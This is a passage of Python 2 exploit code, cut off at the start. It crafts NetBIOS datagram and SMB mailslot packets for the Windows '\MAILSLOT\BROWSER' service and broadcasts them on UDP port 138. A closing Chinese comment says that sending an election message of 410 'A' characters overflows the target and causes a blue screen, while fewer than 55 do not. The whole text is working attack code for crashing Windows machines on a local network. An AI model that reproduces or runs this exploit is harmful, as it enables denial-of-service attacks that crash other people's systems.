mepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x0
0",pbrowser=""):
packetbrowser = pbrowser #opcode
packetmailslot = "\x01\x00" #Priority
packetmailslot+= "\x00\x00" #unreliable & Broadcast
packetmailslot+= "\x02\x00" # "\MAILSLOT\BROWSER"
packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
packetmailslot+= namepipe +"\x00" # "\MAILSLOT\BROWSER"
packetdatagram = "\x11" #NetBIOS Datagram Service #Direct_group datagram
packetdatagram+= "\x02" #No
packetdatagram+= tid #0x8022
packetdatagram+= inet_aton(ip) #ip = ourip = 192.168.100.243
packetdatagram+= "\x00\x8a" #port(138)
packetdatagram+= "\x00\xa7" #Datagram length
packetdatagram+= "\x00\x00" #Packet Offset
packetdatagramname = encodename(sname,srcservice) #source name
packetdatagramname+= encodename(dname,dstservice) #destination name
smbheader= smbheaderudp("\x25") #start make SMB
packetrans2 = "\x11" #SMB->TransRequest
packetrans2+= "\x00\x00"
packetrans2+= lengthlittle(packetbrowser,0)
packetrans2+= "\x00\x00"
packetrans2+= "\x00\x00"
packetrans2+= "\x00"
packetrans2+= "\x00"
packetrans2+= "\x00\x00"
packetrans2+= "\xe8\x03\x00\x00"
packetrans2+= "\x00\x00"
packetrans2+= "\x00\x00"
packetrans2+= "\x00\x00"
packetrans2+= lengthlittle(packetbrowser,0) #data count
packetrans2+=lengthlittle(smbheader+packetrans2+packetmailslot,4)#data
offset
packetrans2+= "\x03"
packetrans2+= "\x00"
andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+pack
etbrowser
packetotalength = list(packetfinal)
packetotalength[10:12] = lengthbig(lengthcalc,0)
packetrans2final = ''.join(packetotalength)
return packetrans2final
def sockbroad(host,sourceservice,destservice,packet):
s = socket(AF_INET,SOCK_DGRAM)
s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
s.bind(('0.0.0.0', 13800)) #原本为 138,但是可以改成本机未被占有的端口
try:
packsmbheader = smbheaderudp("\x25")
buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe
="\MAILSLOT\BROWSER",srcservice=sourceservice, dstservice=destservice,
pbrowser=packet)
s.sendto(buffer0,(host,138))
except:
print "expected SDL error:", sys.exc_info()[0]
raise
#election("A" * 410)是导致错误的原因,造成了溢出,如果说构造的” A”个数小于
55 的时候,则不会导致蓝屏 |
